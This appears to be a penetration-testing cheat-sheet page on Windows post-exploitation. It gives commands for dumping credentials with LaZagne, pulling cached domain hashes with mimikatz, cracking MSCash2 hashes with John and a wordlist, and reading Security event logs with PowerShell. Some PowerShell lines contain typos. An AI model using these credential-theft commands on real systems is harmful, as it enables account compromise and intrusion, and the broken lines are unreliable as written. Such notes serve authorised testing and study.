Post Exploitation
LaZagne
Really simple and sweet tool for credential dumping
.\laZagne.exe allMSCash
Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon
From mimikatz,
privilege::debug
lsadump::cacheCracking it
john-jumbo mscash --wordlist=/usr/share/wordlists/rockyou.txt --format=mscash2Reading Event Logs
User must be in "Event Log Reader" group Follow this link
Get-WinEvent -ListLog *
# Listing logs of a specific user
$cred = Get-Credentials
Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred
# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessNam
e';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={
$_.Properties[8].Value }}).commandlinePassword Dumping
Last updated